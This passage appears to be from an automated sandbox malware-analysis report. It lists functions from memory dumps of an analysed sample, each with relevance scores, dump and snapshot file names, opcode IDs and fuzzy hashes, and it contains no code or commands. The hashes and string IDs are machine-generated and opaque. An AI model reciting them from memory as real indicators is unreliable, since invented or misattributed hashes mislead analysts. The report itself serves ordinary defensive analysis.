                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f24be62d33d98865bee20ea69aeb9a1f16bc659e85a306854c0b1d2089ee88b
                                                      • Instruction ID: 09f41b5c9fd4df26509033bc2667e38c424628746ef86af28e586dee72187850
                                                      • Opcode Fuzzy Hash: 4f24be62d33d98865bee20ea69aeb9a1f16bc659e85a306854c0b1d2089ee88b
                                                      • Instruction Fuzzy Hash: 23117AFB02C034ADA652F58827546FA3B6AE6D3339F304C66E8436666ED1D00D47B131
                                                      Function 07920C44 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31851c77857689fc2e5fe8e2709b981a4dc53939b87ccad1baa2d4296fdbe411
                                                      • Instruction ID: ab7ff40814c57418b3a185afde0cea1c55259630480ebda64c3cdfd7ced971d1
                                                      • Opcode Fuzzy Hash: 31851c77857689fc2e5fe8e2709b981a4dc53939b87ccad1baa2d4296fdbe411
                                                      • Instruction Fuzzy Hash: 731159F70180349EA602E68857546FA3769D7D3339F304C66E80667168D1D04D4BB131
                                                      Function 07920BCC Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7ba0dba92602e5fc75b5f3696efd5fda2b98449935102156cc132a72cf3bcee8
                                                      • Instruction ID: 568d3be2aad8d3f0745b77cfa9603f8ef9a54afc91d52d376a49dcf02f12dd80
                                                      • Opcode Fuzzy Hash: 7ba0dba92602e5fc75b5f3696efd5fda2b98449935102156cc132a72cf3bcee8
                                                      • Instruction Fuzzy Hash: FC016BF7018034AEA602E6C817546FA3769D7D3335F304C6AA84367168C5E14D4BB132
                                                      Function 07920C65 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76cfd1b644e5197ea6e2899d8e3de25efe22c1be2101efd816004a86b85f4df2
                                                      • Instruction ID: 73a8b6bd9fd581b9341061a0f458c4fba2a718beaa897ea53df0f467fa6eb2d3
                                                      • Opcode Fuzzy Hash: 76cfd1b644e5197ea6e2899d8e3de25efe22c1be2101efd816004a86b85f4df2
                                                      • Instruction Fuzzy Hash: 210147F702C1389D8A06F69C23642FE3FA5AA87239F304D6BD8466E178D5A14947F251
                                                      Function 07920C05 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8869e768f2c577f68bdb1e908217eccae752622ac70eb867d453702cf538c028
                                                      • Instruction ID: 3533cc02a953fc7484dc91496fae3486ed44fbb590c0cf740e339a26ca401a50
                                                      • Opcode Fuzzy Hash: 8869e768f2c577f68bdb1e908217eccae752622ac70eb867d453702cf538c028
                                                      • Instruction Fuzzy Hash: A0017BF74181389E8702F68C17546FE3BA5A787239F304D67DC027B07CD1A14D47A261
                                                      Function 07920C1D Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1a0c4c0b3ca8718ce023014fd10b7e1dea5339b15435b894afec78118a9a9e5
                                                      • Instruction ID: eea66c631c9bc5a562d9dd2c0025a1237b750021c5dd29ce7f9987220b59761b
                                                      • Opcode Fuzzy Hash: e1a0c4c0b3ca8718ce023014fd10b7e1dea5339b15435b894afec78118a9a9e5
                                                      • Instruction Fuzzy Hash: 83F07DF6428538DDCB02FA8C16541FE3B64A783339F300D6AD8422B1BCC9E10907B166
                                                      Function 079B0D80 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90a30a9080054b9bfc5a4cb81cfd0dad3c6b4f103b756e85cdd66824647bb585
                                                      • Instruction ID: c415f589e4d031c6ec2023bf6af041b0aeafd66c93833a59cbfd398951a30233
                                                      • Opcode Fuzzy Hash: 90a30a9080054b9bfc5a4cb81cfd0dad3c6b4f103b756e85cdd66824647bb585
                                                      • Instruction Fuzzy Hash: 73E092EB2482207D704180852F14AFB976EE2E7770772C823F406C2201E2C65A081271
                                                      Function 07920C54 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9300f29ae7329b9853b179e43fdb9a2aafa484de63621bc12f64dbc6d4e8a383
                                                      • Instruction ID: 2d4386d0e0c9b62ffb25e998740fdb7b8ebc4b1367c97bec1af482418e2cd227
                                                      • Opcode Fuzzy Hash: 9300f29ae7329b9853b179e43fdb9a2aafa484de63621bc12f64dbc6d4e8a383
                                                      • Instruction Fuzzy Hash: 3DE0D8F7818238EDDA02D9D817141FE76B86797378F318CAEDD827A128D1E04C036172

                                                      Non-executed Functions

                                                      Function 0204B469 Relevance: 1.3, Instructions: 1341COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1433208422.0000000002043000.00000004.00000020.00020000.00000000.sdmp, Offset: 02043000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_2043000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 59c12fcef9e1cd9280853b8fbef78be6e201f3ffcb9c4dab1c1f81e056b27eb1
                                                      • Instruction ID: 1e08800bf0909595d095ac63fe4c1dec39d28d48130254edd3d875f4e56aff18
                                                      • Opcode Fuzzy Hash: 59c12fcef9e1cd9280853b8fbef78be6e201f3ffcb9c4dab1c1f81e056b27eb1
                                                      • Instruction Fuzzy Hash: 7E2248A280E3C15FD3138B745CB56917FB0AE27218B0E85DBC4C1CF5B3E658995AE722
                                                      Function 079B0812 Relevance: .1, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc89411316e9cb40e6903b0747250435788aeae406a79a9f0e286e25ba1521ca
                                                      • Instruction ID: 0363062bda1a47cda19f84ebdc2359717e5c6d0f619e321491e8cdc6abcd2f1a
                                                      • Opcode Fuzzy Hash: bc89411316e9cb40e6903b0747250435788aeae406a79a9f0e286e25ba1521ca
                                                      • Instruction Fuzzy Hash: A42179E615D1916EE32380985FA06F77F1DE7C763573449ABE046CE643E1C60E8B42E1
                                                      Function 07970676 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 6c0454ea0e8fc1847fd0700c08ace52391c5be050155f2c9d327f94f460d9e0e
                                                      • Instruction ID: 3b270c10ec288224f6c237a320608c73752e64fe7d5d142a41c17eb68febbd2f
                                                      • Opcode Fuzzy Hash: 6c0454ea0e8fc1847fd0700c08ace52391c5be050155f2c9d327f94f460d9e0e
                                                      • Instruction Fuzzy Hash: 6E017BEF21C5107CA142454D5B64AFB6BAEE6D7A74B308E26F0039A382A2E44A1AC075
                                                      Function 07970696 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 94c33c6c629529c715a6d3ce062edf5163b81c41bdd6657f7d5d6f75d3347e8a
                                                      • Instruction ID: 321ddb4cb19ca8e59ba3c4db5d0c2a0af326bc7575e3cf8f174ee72372409e8c
                                                      • Opcode Fuzzy Hash: 94c33c6c629529c715a6d3ce062edf5163b81c41bdd6657f7d5d6f75d3347e8a
                                                      • Instruction Fuzzy Hash: C5F04CEB15C6107CE142458D1F10BF7ABADE7D7B74F308916F003D6382A2E40A5AD431
                                                      Function 079706A6 Relevance: 6.3, Strings: 5, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 9e55d2ec8cf4e1678aa925f3c2be2642c5684424703f60af8aea05cfca5a5248
                                                      • Instruction ID: e8306fff0b68b1d27fa7ddbd8eae08da962f28503b8872a16c16978ff6aeb372
                                                      • Opcode Fuzzy Hash: 9e55d2ec8cf4e1678aa925f3c2be2642c5684424703f60af8aea05cfca5a5248
                                                      • Instruction Fuzzy Hash: B3F046FB25C210BCA152059D1F60AFB7BAEE6C7B74B308926F003D7382D2E40A5AC534
                                                      Function 0797059F Relevance: 6.3, Strings: 5, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 5accf97427f417b8004049d91cd7eff0c15cefdc5f2bedeae0cac04faf821f1a
                                                      • Instruction ID: db562b7bd7ae962f44adf5383dc0039c04df722e2f257aa217ea870b9610b893
                                                      • Opcode Fuzzy Hash: 5accf97427f417b8004049d91cd7eff0c15cefdc5f2bedeae0cac04faf821f1a
                                                      • Instruction Fuzzy Hash: FDF0ACE775D114ADB342851A1A355F95B19E6C3638F30CE37E807C7A02D0C40E4DC270
                                                      Function 07970587 Relevance: 6.3, Strings: 5, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 29c7f108867c082c015124903e1951d720e1b04ee80f56eacfc5fc5e03fbd0ec
                                                      • Instruction ID: 73104a38003d6421d631c41dfe7bf4bae73662f05ba5887227980e35780e4f47
                                                      • Opcode Fuzzy Hash: 29c7f108867c082c015124903e1951d720e1b04ee80f56eacfc5fc5e03fbd0ec
                                                      • Instruction Fuzzy Hash: 2FF0F6EB66D424ADA242850E57B45FD6759E2C7678F708A26E407DB602E1C80F8AC171
                                                      Function 079705F0 Relevance: 6.3, Strings: 5, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 9162207616a344175ac8731760fb7b1a19eb56d6b1acd0cbb2c2e9e1b09cdcb1
                                                      • Instruction ID: 725c7a7c9eeb68c057b4e2385f8f612c8ba323849260f7b894998a531ebe6135
                                                      • Opcode Fuzzy Hash: 9162207616a344175ac8731760fb7b1a19eb56d6b1acd0cbb2c2e9e1b09cdcb1
                                                      • Instruction Fuzzy Hash: D4E0D8E725E9545EA213814A1A70AB95B19A5C357C7B0C626B44BD7542C0841F4D81B1
                                                      Function 079705D4 Relevance: 6.3, Strings: 5, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 524f635f3868a00d93ba6a382a94c1bd5ce027431d528199f3b5a9350344fe8b
                                                      • Instruction ID: 2fcc2ca36efc08b45f97680cc181f3ca9d6de72882c1bb70df73d18113ac4ee1
                                                      • Opcode Fuzzy Hash: 524f635f3868a00d93ba6a382a94c1bd5ce027431d528199f3b5a9350344fe8b
                                                      • Instruction Fuzzy Hash: 29E08CDBB6E8289DA592845A56786FC460193D76B8F30CF22A40BCB642D0C41F99C1A9
                                                      Function 079706DD Relevance: 6.3, Strings: 5, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 6fda5ad4dfc3647a54022ab8ca519ec2f70094deb2186c9029ee603f328353e8
                                                      • Instruction ID: 86eb5e6fbe15751ffc3cf9da044e662f12c40da4fa581aef21de266cb206da02
                                                      • Opcode Fuzzy Hash: 6fda5ad4dfc3647a54022ab8ca519ec2f70094deb2186c9029ee603f328353e8
                                                      • Instruction Fuzzy Hash: BBE068F510C200AEC3830F680D501FA7BB9FF5BA28F20051CE08786302E2E80524CB54
                                                      Function 079705F9 Relevance: 6.3, Strings: 5, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 8bb8bd1868698ae084f9d0b4ceb261c023bf4ac358d20e54b0ee2364d509e6f3
                                                      • Instruction ID: cb80ff2d5bf95ded2fad76357e52fb1381741624da643c61391efe145ce2e70f
                                                      • Opcode Fuzzy Hash: 8bb8bd1868698ae084f9d0b4ceb261c023bf4ac358d20e54b0ee2364d509e6f3
                                                      • Instruction Fuzzy Hash: 1FE026D236E564AEE24385091A708BD9B28A6D363CB34CB27A447C7143D4841A58C2B0
                                                      Function 079708C4 Relevance: 6.3, Strings: 5, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: b721f583a9d06a5b5029c759a1d727b532f17b6aa715b332ffd1dfa45ff06f83
                                                      • Instruction ID: 9e55724f48e21ac83c25dbf98bcb984eec3a72108a6043dd4d8e1f1a395c7986
                                                      • Opcode Fuzzy Hash: b721f583a9d06a5b5029c759a1d727b532f17b6aa715b332ffd1dfa45ff06f83
                                                      • Instruction Fuzzy Hash: C2E0D8EB58E3819EE707C5985C024C53F64D9A7A743295C9BC8918B157D1854803C7E5
                                                      Function 07970622 Relevance: 6.3, Strings: 5, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: caa9298ee2588a20f907ebf0b59092832d9d667c8bedfad82f47c2c8b078430e
                                                      • Instruction ID: af91dc24d34f7c39ac521337463df051a84f942fb9421ec23dd7a15f4a90775d
                                                      • Opcode Fuzzy Hash: caa9298ee2588a20f907ebf0b59092832d9d667c8bedfad82f47c2c8b078430e
                                                      • Instruction Fuzzy Hash: 4FE0687020A9C4DFC3028378E9659D1BB60AF8B618B244DDEC8409F092D2614051C201
                                                      Function 079706FC Relevance: 6.3, Strings: 5, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: f863c968c64789ef6490d493df6b62e80eb960c1bc1414ff7487a23e84ba8de1
                                                      • Instruction ID: 522ca142b118d9e6e9c702e2b79d22c0a790ac512b2522b99e02cb77f83d4217
                                                      • Opcode Fuzzy Hash: f863c968c64789ef6490d493df6b62e80eb960c1bc1414ff7487a23e84ba8de1
                                                      • Instruction Fuzzy Hash: 6EE02BF411C706CFC3955F9045414757BE1FF6B334F201A2CA08319382DBBD1561CA4A
                                                      Function 0797071F Relevance: 6.3, Strings: 5, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: b24df20bd4e4ec89fa33825a874eb650f6b8d3c23e1e2e8db4e2b1a202c1ae59
                                                      • Instruction ID: 71def46cfbea92ef27451e83fa3e246ec25ee55f757a7f14ec2f573f529fe885
                                                      • Opcode Fuzzy Hash: b24df20bd4e4ec89fa33825a874eb650f6b8d3c23e1e2e8db4e2b1a202c1ae59
                                                      • Instruction Fuzzy Hash: A8D022F000DA06CD93450E604641AFB3BD5EB6B214BA0141CE04A0A702D9780028CC09
                                                      Function 07970728 Relevance: 6.3, Strings: 5, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: d70c33e664dbd3df12f5736f5b032df32662f5d57959748b09d54f743e16ffaf
                                                      • Instruction ID: bede92bb370efb1be1ee2157c8084dcc787dbc7265d93642b1bb70f9511cf25a
                                                      • Opcode Fuzzy Hash: d70c33e664dbd3df12f5736f5b032df32662f5d57959748b09d54f743e16ffaf
                                                      • Instruction Fuzzy Hash: A5C08CF841CB02DEE3961E2080418BEBBD0FF67301B20992EE08516302DE799024C90A
                                                      Function 0797065C Relevance: 6.3, Strings: 5, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: e88e72e79a4997a091930d8e6589e58c4ec5cdfbd28c8d59d7dbb5331bf8af4c
                                                      • Instruction ID: f7f42639dac3b3df0af664bcf9ff124e6509794162e1e63e2c6b536eb084abe6
                                                      • Opcode Fuzzy Hash: e88e72e79a4997a091930d8e6589e58c4ec5cdfbd28c8d59d7dbb5331bf8af4c
                                                      • Instruction Fuzzy Hash: B0C02BD1304E91C78107400C1ABC4343385A6E745F30853AAC140CF123F8424CC7C251
                                                      Function 079707DC Relevance: 6.3, Strings: 5, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 08b93ce0e76dbaab24110fbe00703c33161b2d24049415a453d9a7058ab55d2a
                                                      • Instruction ID: 1e633423322b87d70187a47814b9f0789de6b7c7c7edfa9ef734b34da3c3d758
                                                      • Opcode Fuzzy Hash: 08b93ce0e76dbaab24110fbe00703c33161b2d24049415a453d9a7058ab55d2a
                                                      • Instruction Fuzzy Hash: 36B09BD109505545CF1DD958DCE46D037B76705314D6121C5D0C64551697215687CD08
                                                      Function 0797087D Relevance: 6.3, Strings: 5, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 5e616075457a5fea74a7ba4e46d3aa88f2cb58a5f9b1043c88e093ba591d28f3
                                                      • Instruction ID: 8d50d6869603cf1ea87ba6f925290d6f86b4179af31c8c0cb3134c7739c93238
                                                      • Opcode Fuzzy Hash: 5e616075457a5fea74a7ba4e46d3aa88f2cb58a5f9b1043c88e093ba591d28f3
                                                      • Instruction Fuzzy Hash: 61B012900198018B99101228CD633CB03186721748E000E1045BA93DC342A210C280D3
                                                      Function 0797080D Relevance: 6.3, Strings: 5, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 2d15912c8aec011583274e4fc1fa5d7a94659f47fa6ab5604f5e622e0e66bf81
                                                      • Instruction ID: 514e58432599e0da51c230a4af37c29560a3337ab80e473e163ce2fc992b62b0
                                                      • Opcode Fuzzy Hash: 2d15912c8aec011583274e4fc1fa5d7a94659f47fa6ab5604f5e622e0e66bf81
                                                      • Instruction Fuzzy Hash: 3DB0120730B25466D70010B430069C09650940306232CA974D5614AE47A248000B9781
                                                      Function 079707F7 Relevance: 6.3, Strings: 5, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 8fdaee40d6ceabd7b74980fcdb7e6ed36ed6997dd26a3a8acea0037b1e4e22a4
                                                      • Instruction ID: 8b30d3385170913ad1f6f3d818473e7f39782a0e2cae593c52b9da605f56a8a2
                                                      • Opcode Fuzzy Hash: 8fdaee40d6ceabd7b74980fcdb7e6ed36ed6997dd26a3a8acea0037b1e4e22a4
                                                      • Instruction Fuzzy Hash: A1B012A31294505DC3038A90C0D40D87B91ED5795634944CCC5485F64BC15F0303C3B1
                                                      Function 07970836 Relevance: 6.3, Strings: 5, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: e6b416e81b0e3cd4c4156da8a2cf13ad7f6880ead81c1bb52c870e7684258529
                                                      • Instruction ID: 2e01cb7b8a0f19871c617ee48e81ce7fa0ce5e80cdb6d9c47327a68509ad55cb
                                                      • Opcode Fuzzy Hash: e6b416e81b0e3cd4c4156da8a2cf13ad7f6880ead81c1bb52c870e7684258529
                                                      • Instruction Fuzzy Hash: 63B01263C0017949D71056B851EC2CC67B4AB5E608F304DE9C801D3904C37A87CA9CC2
                                                      Function 0797085A Relevance: 6.3, Strings: 5, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
